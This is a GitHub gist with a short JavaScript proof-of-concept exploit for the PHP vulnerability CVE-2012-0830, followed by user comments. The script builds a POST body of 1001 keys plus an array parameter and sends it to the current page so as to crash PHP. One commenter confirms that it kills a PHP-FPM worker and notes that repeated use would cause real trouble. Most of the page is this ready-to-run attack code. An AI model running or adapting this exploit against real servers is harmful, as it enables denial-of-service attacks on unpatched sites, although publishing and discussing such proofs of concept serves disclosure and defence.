Skip to content

Instantly share code, notes, and snippets.

@pilate
Created February 2, 2012 20:11
Show Gist options
  • Save pilate/1725489 to your computer and use it in GitHub Desktop.
Save pilate/1725489 to your computer and use it in GitHub Desktop.
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
// Generate 1000 normal keys and one array
function createEvilObj () {
var evil_obj = {};
for (var i = 0; i < 1001; i++) {
evil_obj[i] = 1;
}
evil_obj['kill[]'] = 'kill';
return evil_obj;
}
// Serialize Javascript object into POST data
function serializeObj (obj) {
var str = [];
for(var p in obj) {
str.push(p + "=" + obj[p]);
}
return str.join("&");
}
// Run attack
function attackSite () {
var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest();
xhr.open("POST", location.href, true);
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.setRequestHeader('Content-Length', bad.length);
xhr.send(bad);
}
attackSite();
@adrian-rt
Copy link

there are actually 1001 normal keys + one array there.....

@Tatsh
Copy link

Tatsh commented Feb 3, 2012

My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.

@adrian-rt
Copy link

It was just an observation really. Can you provide some technical details about what exactly happens inside php?
I know some php internals, but not enought for this actually......Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment